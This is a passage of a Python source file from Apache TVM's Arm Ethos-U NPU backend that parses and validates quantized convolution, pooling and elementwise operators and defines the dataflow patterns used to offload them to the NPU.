# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=ungrouped-imports, import-outside-toplevel
"""Arm(R) Ethos(TM)-U NPU supported operators."""
import functools
from typing import Dict, List, Tuple, Callable, Optional
import numpy as np # type: ignore
import tvm # type: ignore
from tvm import relay
from tvm.relay.expr import Constant, Call # type: ignore
from tvm.relay.op.contrib.register import register_pattern_table # type: ignore
from tvm.relay.dataflow_pattern import wildcard, is_op, is_constant, is_tuple # type: ignore
from tvm.relay.build_module import bind_params_by_name # type: ignore
try:
# As ethos-u-vela package is an optional TVM dependency, we want to lazy load it
# and check whether it is installed or not.
#
# In order to show the appropriate error messages when we try to invoke code that
# rely on imports from ethos-u-vela, we protect them with the decorator @requires_vela
# implemented below.
from ethosu.vela import api as vapi # type: ignore
except ImportError:
vapi = None
def requires_vela(func):
    """Decorator to check whether we have the required dependency ethos-u-vela
    installed as a python package"""

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # vapi is None when the optional import at module load time failed.
        if vapi:
            return func(*args, **kwargs)
        raise ImportError(
            "The 'ethos-u-vela' python package is required for the Arm(R) Ethos(TM)-U NPU "
            "backend. Please install the dependency using your Python package manager."
        ) from None

    return wrapper
class TensorParams:
    """
    This class will parse a tvm Expr along with quantization scale
    and zero point to populate parameters that are required
    for the creation of tensors in Vela.
    """

    @requires_vela
    def __init__(self, tensor, layout=None, scale=None, zero_point=None):
        self.tensor = tensor
        # Only relay Constants carry concrete data we can inspect here.
        self.values = tensor.data.asnumpy() if isinstance(tensor, Constant) else None
        self.dtype = tensor.checked_type.dtype
        self.shape = [int(dim) for dim in tensor.checked_type.shape]
        self.layout = layout
        if scale is None or zero_point is None:
            # put default values
            self.q_params = vapi.NpuQuantization(1.0, 0)
        else:
            self.q_params = vapi.NpuQuantization(
                scale.data.asnumpy().astype("float32"),
                zero_point.data.asnumpy().astype(self.dtype),
            )
def check_strides(strides: List[int], stride_range=None) -> bool:
    """This function checks whether strides are within the limits supported by the NPU"""
    if stride_range is None:
        stride_range = (1, 3)
    smin, smax = stride_range
    # Both the height and width stride must sit inside [smin, smax].
    return smin <= strides[0] <= smax and smin <= strides[1] <= smax
def check_valid_dtypes(tensor_params: List[TensorParams], supported_dtypes: List[type]) -> bool:
    """This function checks whether dtypes are supported by the NPU"""
    for param in tensor_params:
        # Reject unsupported element types outright.
        if np.dtype(param.dtype) not in supported_dtypes:
            return False
        # Reject any dimension longer than 65536.
        if any(dim > 65536 for dim in param.shape):
            return False
    return True
def check_weights(weights: TensorParams, dilation: List[int]):
    """This function checks whether weight tensor is compatible with the NPU

    Validates the dilated kernel extent against the NPU limits and bounds
    the accumulator saturation by the summed absolute weight magnitude.
    Returns True when the weights are acceptable.
    """
    from tvm.relay.backend.contrib.ethosu.util import get_dim_value

    # Supported dilated kernel extents (inclusive ranges).
    dilated_height_range = (1, 64)
    dilated_hxw_range = (1, 64 * 64)
    weights_limit = 127 * 65536
    # NOTE(review): width is dilated by dilation[0] and height by
    # dilation[1] — confirm this matches the (h, w) ordering used upstream.
    dilated_width = (weights.shape[get_dim_value(weights.layout, "W")] - 1) * dilation[0] + 1
    dilated_height = (weights.shape[get_dim_value(weights.layout, "H")] - 1) * dilation[1] + 1
    dh_min, dh_max = dilated_height_range
    if not dh_min <= dilated_height <= dh_max:
        return False
    dilated_hxw = dilated_height * dilated_width
    dhxw_min, dhxw_max = dilated_hxw_range
    if not dhxw_min <= dilated_hxw <= dhxw_max:
        return False
    # A saturation upper bound check for accumulators
    # NOTE(review): this mutates weights.values in place (subtracts the
    # zero point); callers reusing the TensorParams afterwards see the
    # shifted values — confirm this is intended.
    weights.values = weights.values - weights.q_params.zero_point
    axis = (
        get_dim_value(weights.layout, "H"),
        get_dim_value(weights.layout, "W"),
        get_dim_value(weights.layout, "I"),
    )
    sum_weights = np.amax(np.sum(np.absolute(weights.values), axis=axis))
    return sum_weights <= weights_limit
def check_bias(bias: TensorParams):
    """This function checks whether the bias values fit in 40 bits"""
    # Only int64 biases are range-checked; anything else (or no bias) passes.
    if not (bias and bias.dtype == np.dtype("int64")):
        return True
    # bin() yields '0b...'; the digits after the prefix must fit in 40 bits.
    return all(len(bin(bias_value)[2:]) <= 40 for bias_value in bias.values)
def check_batch_size(ifm: TensorParams):
    """This function checks for the number of batches vela currently supports"""
    # Only a batch dimension of exactly 1 is accepted.
    return ifm.shape[0] == 1
def check_dilation(dilation: List[int], dilation_range=None):
    """This function checks whether dilation is within the limits supported by the NPU"""
    low, high = dilation_range if dilation_range is not None else (1, 2)
    # Both dilation factors must sit inside [low, high].
    return low <= dilation[0] <= high and low <= dilation[1] <= high
def check_padding(padding: List[int], bounds: List[int]):
    """This function checks whether padding is within the limits supported by the NPU"""
    # Both lists carry (top, left, bottom, right) in the same order.
    if len(padding) != 4 or len(bounds) != 4:
        return False
    return all(value <= bound for value, bound in zip(padding, bounds))
def check_pool_shape(pool_shape: tvm.ir.container.Array) -> bool:
    # A pool shape must be 2-D with width <= 256 and area <= 256 * 256.
    if len(pool_shape) != 2:
        return False
    if pool_shape[1] > 256:
        return False
    return pool_shape[0] * pool_shape[1] <= 256 * 256
def check_dimensions(tensor: TensorParams):
    """This function checks that the tensor has no more than 4 dimensions"""
    # Rank is derived from the parsed static shape.
    return len(tensor.shape) <= 4
class QnnConv2DParams:
    """
    This class will parse a Call to a ethosu.qnn_conv2d composite function
    and extract quantization information of all the associated tensors.
    """
    composite_name = "ethos-u.qnn_conv2d"
    # The NPU only supports padding upto the numbers as follows
    padding_bounds = [31, 31, 32, 32]
    # Maps relay op names recognised as fused activations to NPU identifiers.
    activation_map = {"clip": "CLIP"}
    @requires_vela
    def __init__(self, func_body: tvm.relay.Function):
        """Decompose the composite body (optional clip -> requantize ->
        bias_add -> qnn.conv2d, optionally fed by nn.pad) and record the
        tensors, quantization parameters and convolution attributes."""
        from tvm.relay.backend.contrib.ethosu.util import QConv2DArgs  # type: ignore
        from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        activation = None
        separate_padding = None
        # The outermost call is either the requantize or a fused activation.
        if str(func_body.op) in self.activation_map.keys():
            activation = func_body
            requantize_op = activation.args[0]
        else:
            requantize_op = func_body
        bias_add = requantize_op.args[0]
        qnn_conv2d = bias_add.args[0]
        # A standalone nn.pad feeding the convolution may later be folded into
        # the NPU convolution's own padding attribute (see extract_padding).
        if isinstance(qnn_conv2d.args[0], relay.Call) and str(qnn_conv2d.args[0].op) == "nn.pad":
            separate_padding = qnn_conv2d.args[0]
        data_layout = qnn_conv2d.attrs.data_layout
        self.kernel_layout = qnn_conv2d.attrs.kernel_layout
        # We consider the weights & biases as params as it should be a Constant
        self.weights = TensorParams(
            qnn_conv2d.args[QConv2DArgs.WEIGHTS.value],
            self.kernel_layout,
            qnn_conv2d.args[QConv2DArgs.WEIGHTS_SCALE.value],
            qnn_conv2d.args[QConv2DArgs.WEIGHTS_ZERO_POINT.value],
        )
        self.biases = TensorParams(
            bias_add.args[BiasAddArgs.BIASES.value],
            data_layout,
            requantize_op.args[RequantArgs.IFM_SCALE.value],
            requantize_op.args[RequantArgs.IFM_ZERO_POINT.value],
        )
        # When padding is a separate nn.pad, the real IFM is the pad's input.
        ifm_tensor = (
            separate_padding.args[0] if separate_padding else qnn_conv2d.args[QConv2DArgs.IFM.value]
        )
        self.ifm = TensorParams(
            ifm_tensor,
            data_layout,
            qnn_conv2d.args[QConv2DArgs.IFM_SCALE.value],
            qnn_conv2d.args[QConv2DArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            func_body,
            data_layout,
            requantize_op.args[RequantArgs.OFM_SCALE.value],
            requantize_op.args[RequantArgs.OFM_ZERO_POINT.value],
        )
        attrs = qnn_conv2d.attrs
        # The separate pad may only be merged if it pads with the IFM zero point.
        pad_value = int(qnn_conv2d.args[QConv2DArgs.IFM_ZERO_POINT.value].data.asnumpy())
        self.padding = self.extract_padding(attrs.padding, separate_padding, pad_value)
        self.strides = attrs.strides
        self.dilation = attrs.dilation
        self.activation = activation
        self.channels = attrs.channels
        # If groups are equal to channel, its a depthwise_conv2d
        self.groups = attrs.groups
        self.is_depthwise = False
        # Output-channel axis position depends on the kernel layout.
        channels_axis = {"HWIO": 3, "HWOI": 2}
        if self.groups == self.weights.shape[channels_axis[self.kernel_layout]]:
            self.is_depthwise = True
    @staticmethod
    def extract_padding(
        operator_padding: Tuple[int, int, int, int],
        separate_padding: relay.Call,
        pad_value: int,
    ) -> Optional[Tuple[int, int, int, int]]:
        """
        Convolution operations can sometimes have padding represented as a separate
        padding operation before the convolution operation itself. Here we can check
        whether these representations can be combined into a single padding attribute
        as part of the NPU convolution itself. If the padding specified by the separate
        nn.pad operation is not supported, None will be returned. This will cause the
        nn.pad to be offloaded separately.
        """
        if separate_padding is None:
            return operator_padding
        # The pad value must equal the IFM zero point for the merge to be lossless.
        if pad_value != int(separate_padding.args[1].data.asnumpy()):
            return None
        pad_width = separate_padding.attrs["pad_width"]
        if len(pad_width) != 4:
            return None
        # Only spatial (H, W) padding can be merged; N and C must be unpadded.
        if list(pad_width[0]) != [0, 0] or list(pad_width[3]) != [0, 0]:
            return None
        top, left, bottom, right = operator_padding
        # Sum the conv's own padding with the nn.pad amounts per side.
        return [
            top + pad_width[1][0],
            left + pad_width[2][0],
            bottom + pad_width[1][1],
            right + pad_width[2][1],
        ]
    def is_valid(self) -> bool:
        """
        This function checks whether QnnConv2D has compatible attributes with the NPU
        """
        tensor_params = [self.weights, self.ifm, self.ofm]
        if not check_valid_dtypes(tensor_params, supported_dtypes=[np.uint8, np.int8]):
            return False
        if not check_weights(self.weights, self.dilation):
            return False
        if not check_bias(self.biases):
            return False
        if not check_strides(self.strides):
            return False
        if not check_batch_size(self.ifm):
            return False
        if not check_dilation(self.dilation):
            return False
        # self.padding is None when a separate nn.pad could not be merged.
        if not self.padding or not check_padding(self.padding, self.padding_bounds):
            return False
        legal_groups = [1, self.ofm.shape[3]]
        if self.groups not in legal_groups:
            return False
        # This should be a valid QnnDepthwiseConv2DParams, not QnnConv2DParams
        return not self.is_depthwise
class QnnConv2DTransposeParams:
    """
    This class will parse a Call to a ethosu.qnn_conv2d_transpose composite
    function and extract quantization information of all the associated tensors.
    """
    composite_name = "ethos-u.qnn_conv2d_transpose"
    # The NPU only supports padding upto the numbers as follows
    padding_bounds = [31, 31, 32, 32]
    @requires_vela
    def __init__(self, func_body: tvm.relay.Function):
        """Decompose requantize(optional nn.bias_add(qnn.conv2d_transpose))
        and record tensors, attributes and the padding the legalization to
        conv2d will produce."""
        from tvm.relay.backend.contrib.ethosu.util import QConv2DTransposeArgs  # type: ignore
        from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        requantize = func_body
        call = func_body.args[0]
        # bias_add is optional in this composite (see qnn_conv2d_transpose_pattern).
        if str(call.op) == "nn.bias_add":
            bias_add = call
            call = call.args[0]
        else:
            bias_add = None
        qnn_conv2d_transpose = call
        data_layout = qnn_conv2d_transpose.attrs.data_layout
        self.kernel_layout = qnn_conv2d_transpose.attrs.kernel_layout
        self.weights = TensorParams(
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS.value],
            self.kernel_layout,
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS_SCALE.value],
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS_ZERO_POINT.value],
        )
        # Biases are only present when the optional bias_add matched.
        self.biases = (
            TensorParams(
                bias_add.args[BiasAddArgs.BIASES.value],
                data_layout,
                requantize.args[RequantArgs.IFM_SCALE.value],
                requantize.args[RequantArgs.IFM_ZERO_POINT.value],
            )
            if bias_add
            else None
        )
        self.ifm = TensorParams(
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM.value],
            data_layout,
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM_SCALE.value],
            qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            func_body,
            data_layout,
            requantize.args[RequantArgs.OFM_SCALE.value],
            requantize.args[RequantArgs.OFM_ZERO_POINT.value],
        )
        attrs = qnn_conv2d_transpose.attrs
        self.strides = attrs.strides
        self.dilation = attrs.dilation
        self.padding = attrs.padding
        self.channels = attrs.channels
        self.groups = attrs.groups
        self.output_padding = attrs.output_padding
        # For the supported IOHW layout the spatial kernel dims are axes 2-3.
        kernel_size_map = {
            "IOHW": self.weights.shape[2:4],
        }
        self.kernel_shape = kernel_size_map[str(self.weights.layout)]
        # Different padding is used in the legalization from conv2d_transpose
        # to conv2d, so we calculate it here to check that the new size fits
        # within the bounds of the NPU before offloading.
        pad_top = int(self.kernel_shape[0]) - 1 - int(self.padding[0])
        pad_left = int(self.kernel_shape[1]) - 1 - int(self.padding[1])
        pad_bottom = int(self.kernel_shape[0]) - 1 - int(self.padding[2])
        pad_right = int(self.kernel_shape[1]) - 1 - int(self.padding[3])
        # With stride 2 in both dims, bottom/right padding shrinks by one.
        if self.strides == [2, 2]:
            pad_bottom -= 1
            pad_right -= 1
        self.legalize_padding = [pad_top, pad_left, pad_bottom, pad_right]
    def is_valid(self) -> bool:
        """
        This function checks whether QnnConv2DTranspose has compatible attributes with the NPU
        """
        def check_compatible_output_size(ifm_shape, ofm_shape, padding, strides, kernel_shape):
            # With zero padding the kernel overhang adds to the output size;
            # otherwise the output must be exactly ifm * stride per spatial dim.
            is_valid_padding = padding == [0, 0, 0, 0]
            if is_valid_padding:
                expected_height = ifm_shape[1] * strides[0] + (kernel_shape[0] - strides[0])
                expected_width = ifm_shape[2] * strides[1] + (kernel_shape[1] - strides[1])
            else:
                expected_height = ifm_shape[1] * strides[0]
                expected_width = ifm_shape[2] * strides[1]
            return ofm_shape[1] == expected_height and ofm_shape[2] == expected_width
        tensor_params = [self.weights, self.ifm, self.ofm]
        if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
            return False
        if not check_weights(self.weights, self.dilation):
            return False
        if self.biases and not check_bias(self.biases):
            return False
        if not check_strides(self.strides, stride_range=(2, 2)):
            return False
        if not check_batch_size(self.ifm):
            return False
        if not check_dilation(self.dilation, dilation_range=(1, 1)):
            return False
        if not check_compatible_output_size(
            self.ifm.shape,
            self.ofm.shape,
            [int(x) for x in self.padding],
            self.strides,
            self.kernel_shape,
        ):
            return False
        if not check_padding(self.legalize_padding, self.padding_bounds):
            return False
        # NOTE(review): these appear to reject kernels too small for the given
        # bottom/right padding after legalization — confirm against vela docs.
        if self.kernel_shape[0] - 2 - int(self.padding[2]) < 0:
            return False
        if self.kernel_shape[1] - 2 - int(self.padding[3]) < 0:
            return False
        if self.groups != 1:
            return False
        if list(self.output_padding) != [0, 0]:
            return False
        return True
class QnnDepthwiseConv2DParams(QnnConv2DParams):
    """
    Parses a call to a ethosu.depthwise_conv2d composite function and extracts
    the parameter information (tensors and attributes come from the base class).
    """

    composite_name = "ethos-u.depthwise_conv2d"
    # The hardware only supports padding upto the numbers as follows
    padding_bounds = [31, 31, 32, 32]

    def __init__(self, func_body: tvm.relay.expr.Call):
        super().__init__(func_body)

    def is_valid(self):
        """
        Checks whether QnnDepthwiseConv2D + activation function has compatible attributes with HW
        """
        # Each term short-circuits, so later checks only run once earlier ones pass.
        return bool(
            check_valid_dtypes(
                [self.weights, self.ifm, self.ofm], supported_dtypes=[np.uint8, np.int8]
            )
            and check_weights(self.weights, self.dilation)
            and check_bias(self.biases)
            and check_strides(self.strides)
            and check_batch_size(self.ifm)
            and check_dilation(self.dilation)
            and self.padding
            and check_padding(self.padding, self.padding_bounds)
            and self.weights.layout == "HWOI"
            # only depth multiplier of size 1 is supported
            and self.weights.shape[3] == 1
            and self.is_depthwise
        )
def qnn_conv2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the dataflow pattern for qnn.conv2d with an optional fused RELU activation.
    """
    pad = is_op("nn.pad")(wildcard(), is_constant())
    conv = is_op("qnn.conv2d")(
        pad | wildcard(),
        is_constant(),
        is_constant(),
        is_constant(),
        is_constant(),
        is_constant(),
    ).has_attr({"kernel_layout": "HWIO"})
    with_bias = is_op("nn.bias_add")(conv, is_constant())
    requantized = is_op("qnn.requantize")(
        with_bias, is_constant(), is_constant(), is_constant(), is_constant()
    )
    return requantized.optional(is_op("clip"))
def qnn_depthwise_conv2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the dataflow pattern for depthwise qnn.conv2d with an optional fused RELU.
    """
    pad = is_op("nn.pad")(wildcard(), is_constant())
    conv = is_op("qnn.conv2d")(
        pad | wildcard(),
        is_constant(),
        is_constant(),
        is_constant(),
        is_constant(),
        is_constant(),
    ).has_attr({"kernel_layout": "HWOI"})
    with_bias = is_op("nn.bias_add")(conv, is_constant())
    requantized = is_op("qnn.requantize")(
        with_bias, is_constant(), is_constant(), is_constant(), is_constant()
    )
    return requantized.optional(is_op("clip"))
def qnn_conv2d_transpose_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the dataflow pattern for qnn.conv2d_transpose with an optional bias_add.
    """
    transpose = is_op("qnn.conv2d_transpose")(
        wildcard(), is_constant(), is_constant(), is_constant(), is_constant(), is_constant()
    ).has_attr({"kernel_layout": "IOHW"})
    maybe_bias = is_op("nn.bias_add")(transpose, is_constant()) | transpose
    return is_op("qnn.requantize")(
        maybe_bias, is_constant(), is_constant(), is_constant(), is_constant()
    )
class MaxPool2DParams:
    """
    Parses a call to a ethos-u.maxpool2d composite function and extracts
    the parameter information.
    """

    composite_name = "ethos-u.maxpool2d"
    # The hardware only supports padding upto the numbers as follows
    padding_bounds = [127, 127, 128, 128]

    def __init__(self, func_body: Call):
        # The composite is either max_pool2d(...) or clip(max_pool2d(...)).
        if str(func_body.op) == "clip":
            clip = func_body
            pool_op = clip.args[0]
        else:
            clip = None
            pool_op = func_body
        attrs = pool_op.attrs
        self.ifm = TensorParams(pool_op.args[0], attrs.layout)
        self.ofm = TensorParams(pool_op, attrs.layout)
        self.pool_shape = attrs.pool_size
        self.strides = attrs.strides
        self.padding = attrs.padding
        self.activation = clip
        self.pooling_type = "MAX"

    def is_valid(self):
        """
        Check whether this max pooling has NPU-compatible attributes.
        """
        if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.uint8, np.int8]):
            return False
        # Input and output must share the same dtype.
        if self.ofm.dtype != self.ifm.dtype:
            return False
        return (
            check_strides(self.strides)
            and check_batch_size(self.ifm)
            and check_padding(self.padding, self.padding_bounds)
            and check_pool_shape(self.pool_shape)
        )
def qnn_maxpool2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for nn.max_pool2d with an optional fused RELU activation.
    """
    max_pool = is_op("nn.max_pool2d")(wildcard())
    return max_pool.optional(is_op("clip"))
class AvgPool2DParams:
    """
    Parses a call to a ethos-u.avgpool2d composite function and extracts
    the parameter information.
    """

    composite_name = "ethos-u.avgpool2d"
    # The hardware only supports padding upto the numbers as follows
    padding_bounds = [127, 127, 128, 128]

    def __init__(self, func_body: Call):
        # The composite is cast(avg_pool2d(cast(...))) with an optional clip on top.
        if str(func_body.op) == "clip":
            clip = func_body
            cast2 = clip.args[0]
        else:
            clip = None
            cast2 = func_body
        avgpool = cast2.args[0]
        cast1 = avgpool.args[0]
        attrs = avgpool.attrs
        self.ifm = TensorParams(cast1.args[0], attrs.layout)
        self.ofm = TensorParams(cast2, attrs.layout)
        self.pool_shape = attrs.pool_size
        self.strides = attrs.strides
        self.padding = attrs.padding
        self.activation = clip
        self.pooling_type = "AVG"

    def is_valid(self):
        """
        Check whether this average pooling has NPU-compatible attributes.
        """
        if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.uint8, np.int8]):
            return False
        # Input and output must share the same dtype.
        if self.ofm.dtype != self.ifm.dtype:
            return False
        return (
            check_strides(self.strides)
            and check_batch_size(self.ifm)
            and check_padding(self.padding, self.padding_bounds)
            and check_pool_shape(self.pool_shape)
        )
def qnn_avgpool2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for nn.avg_pool2d with an optional fused RELU activation.
    """
    upcast = is_op("cast")(wildcard())
    pooled = is_op("nn.avg_pool2d")(upcast)
    downcast = is_op("cast")(pooled)
    return downcast.optional(is_op("clip"))
class BinaryElementwiseParams:
    """
    This class will parse a call to a ethosu.binary_elementwise composite function
    and extract the parameter information.
    """
    def __init__(self, func_body: Call, operator_type: str, is_quantized_operation: bool):
        """Walk the composite body down to the binary op and record tensors.
        operator_type is the NPU opcode string (e.g. "ADD"). Quantized
        composites carry scales/zero points on the binary op itself; the
        non-quantized form takes them from an optional qnn.requantize wrapper."""
        from tvm.relay.backend.contrib.ethosu.util import BinaryElementwiseArgs
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        current_call = func_body
        clip = None
        requantize = None
        if is_quantized_operation:
            # Quantized form: an optional clip directly wraps the binary op.
            if str(current_call.op) == "clip":
                clip = current_call
                current_call = clip.args[0]
        else:
            # Non-quantized form: requantize(clip(binary_op)) — the clip is
            # assumed to sit between the requantize and the binary op.
            if str(current_call.op) == "qnn.requantize":
                requantize = current_call
                clip = current_call.args[0]
                current_call = clip.args[0]
        binary_op = current_call
        layout = "NHWC"
        if is_quantized_operation:
            # Quantization params come from the qnn binary op's own arguments.
            self.ifm = TensorParams(
                binary_op.args[BinaryElementwiseArgs.IFM.value],
                layout,
                binary_op.args[BinaryElementwiseArgs.IFM_SCALE.value],
                binary_op.args[BinaryElementwiseArgs.IFM_ZERO_POINT.value],
            )
            self.ifm2 = TensorParams(
                binary_op.args[BinaryElementwiseArgs.IFM2.value],
                layout,
                binary_op.args[BinaryElementwiseArgs.IFM2_SCALE.value],
                binary_op.args[BinaryElementwiseArgs.IFM2_ZERO_POINT.value],
            )
            self.ofm = TensorParams(
                binary_op,
                layout,
                binary_op.args[BinaryElementwiseArgs.OFM_SCALE.value],
                binary_op.args[BinaryElementwiseArgs.OFM_ZERO_POINT.value],
            )
        else:
            # Quantization params come from the requantize op if one matched.
            self.ifm = TensorParams(
                binary_op.args[BinaryElementwiseArgs.IFM.value],
                layout,
                requantize.args[RequantArgs.IFM_SCALE.value] if requantize else None,
                requantize.args[RequantArgs.IFM_ZERO_POINT.value] if requantize else None,
            )
            self.ifm2 = TensorParams(
                binary_op.args[BinaryElementwiseArgs.IFM2.value],
                layout,
                requantize.args[RequantArgs.IFM_SCALE.value] if requantize else None,
                requantize.args[RequantArgs.IFM_ZERO_POINT.value] if requantize else None,
            )
            self.ofm = TensorParams(
                func_body,
                layout,
                requantize.args[RequantArgs.OFM_SCALE.value] if requantize else None,
                requantize.args[RequantArgs.OFM_ZERO_POINT.value] if requantize else None,
            )
        self.activation = clip
        self.operator_type = operator_type
        def can_broadcast(ifm, ifm2):
            # Compares trailing dims; rejects when ifm's dim is 1 but ifm2's
            # differs, i.e. only the ifm2 side may be the broadcast one.
            if len(ifm.shape) < len(ifm2.shape):
                return False
            for m, n in zip(ifm.shape[::-1], ifm2.shape[::-1]):
                if m != n and m == 1:
                    return False
            return True
        if can_broadcast(self.ifm, self.ifm2):
            self.reversed_operands = False
            self.valid_broadcast = True
        elif can_broadcast(self.ifm2, self.ifm):
            # Swap so that the broadcastable operand is always ifm2; record
            # the swap so codegen can reverse the operand order.
            self.reversed_operands = True
            self.ifm, self.ifm2 = self.ifm2, self.ifm
            self.valid_broadcast = True
        else:
            self.valid_broadcast = False
    def is_valid(self):
        """
        This function checks whether BinaryElementwise has compatible attributes with the NPU
        """
        # NOTE(review): np.dtype() is constructed from the TensorParams object
        # itself — presumably resolved via its `dtype` attribute; confirm.
        if np.dtype(self.ofm) == np.int32 and self.activation is not None:
            return False
        # Due to identity operator requiring ofm != int32 for now
        if np.dtype(self.ofm) == np.int32 and len(self.ofm.shape) < 4:
            return False
        if len(self.ifm.shape) > 4 or len(self.ifm2.shape) > 4:
            return False
        # When a batch dimension is present it must be 1 on both inputs.
        if len(self.ifm.shape) == 4 and self.ifm.shape[0] != 1:
            return False
        if len(self.ifm2.shape) == 4 and self.ifm2.shape[0] != 1:
            return False
        if not self.valid_broadcast:
            return False
        return True
class AddParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Add composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.add"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "ADD", True)

    def is_valid(self):
        """
        Check whether Add has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        supported = [np.uint8, np.int8, np.int32]
        return bool(check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=supported))
def qnn_add_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for qnn.add with an optional fused RELU activation.
    """
    # Six distinct constant patterns: scales and zero points for both inputs
    # and the output.
    quant_args = [is_constant() for _ in range(6)]
    add = is_op("qnn.add")(wildcard(), wildcard(), *quant_args)
    return add.optional(is_op("clip"))
class SubParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Sub composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.sub"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "SUB", True)

    def is_valid(self):
        """
        Check whether Sub has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        supported = [np.uint8, np.int8, np.int32]
        return bool(check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=supported))
def qnn_subtract_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for qnn.subtract with an optional fused RELU activation.
    """
    # Six distinct constant patterns: scales and zero points for both inputs
    # and the output.
    quant_args = [is_constant() for _ in range(6)]
    sub = is_op("qnn.subtract")(wildcard(), wildcard(), *quant_args)
    return sub.optional(is_op("clip"))
class MulParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Mul composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.mul"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "MUL", True)

    def is_valid(self):
        """
        Check whether Mul has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        supported = [np.uint8, np.int8, np.int32]
        return bool(check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=supported))
def qnn_mul_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for qnn.mul with an optional fused RELU activation.
    """
    # Six distinct constant patterns: scales and zero points for both inputs
    # and the output.
    quant_args = [is_constant() for _ in range(6)]
    mul = is_op("qnn.mul")(wildcard(), wildcard(), *quant_args)
    return mul.optional(is_op("clip"))
class MinParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Min composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.min"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "MIN", False)

    def is_valid(self):
        """
        Check whether Min has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        # Both inputs must share a dtype, and all tensors must be 8-bit.
        if self.ifm.dtype != self.ifm2.dtype:
            return False
        return bool(
            check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8])
        )
def minimum_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for minimum with an optional fused RELU activation.
    """
    bare_min = is_op("minimum")(wildcard(), wildcard())
    clipped = is_op("clip")(bare_min)
    requantized = is_op("qnn.requantize")(
        clipped, is_constant(), is_constant(), is_constant(), is_constant()
    )
    # Either the bare op or the clip+requantize chain may match.
    return bare_min | requantized
class MaxParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Max composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.max"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "MAX", False)

    def is_valid(self):
        """
        Check whether Max has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        # Both inputs must share a dtype, and all tensors must be 8-bit.
        if self.ifm.dtype != self.ifm2.dtype:
            return False
        return bool(
            check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8])
        )
def maximum_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for maximum with an optional fused RELU activation.
    """
    bare_max = is_op("maximum")(wildcard(), wildcard())
    clipped = is_op("clip")(bare_max)
    requantized = is_op("qnn.requantize")(
        clipped, is_constant(), is_constant(), is_constant(), is_constant()
    )
    # Either the bare op or the clip+requantize chain may match.
    return bare_max | requantized
class ShlParams(BinaryElementwiseParams):
    """
    Parses a call to a ethosu.binary_elementwise Shl composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.shl"

    def __init__(self, func_body: Call):
        super().__init__(func_body, "SHL", False)

    def is_valid(self):
        """
        Check whether Shl has NPU-compatible attributes.
        """
        if not super().is_valid():
            return False
        # Left shift is only supported on int32 tensors.
        return bool(check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.int32]))
def shl_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for left_shift with an optional fused RELU activation.
    """
    shift = is_op("left_shift")(wildcard(), wildcard())
    return shift.optional(is_op("clip"))
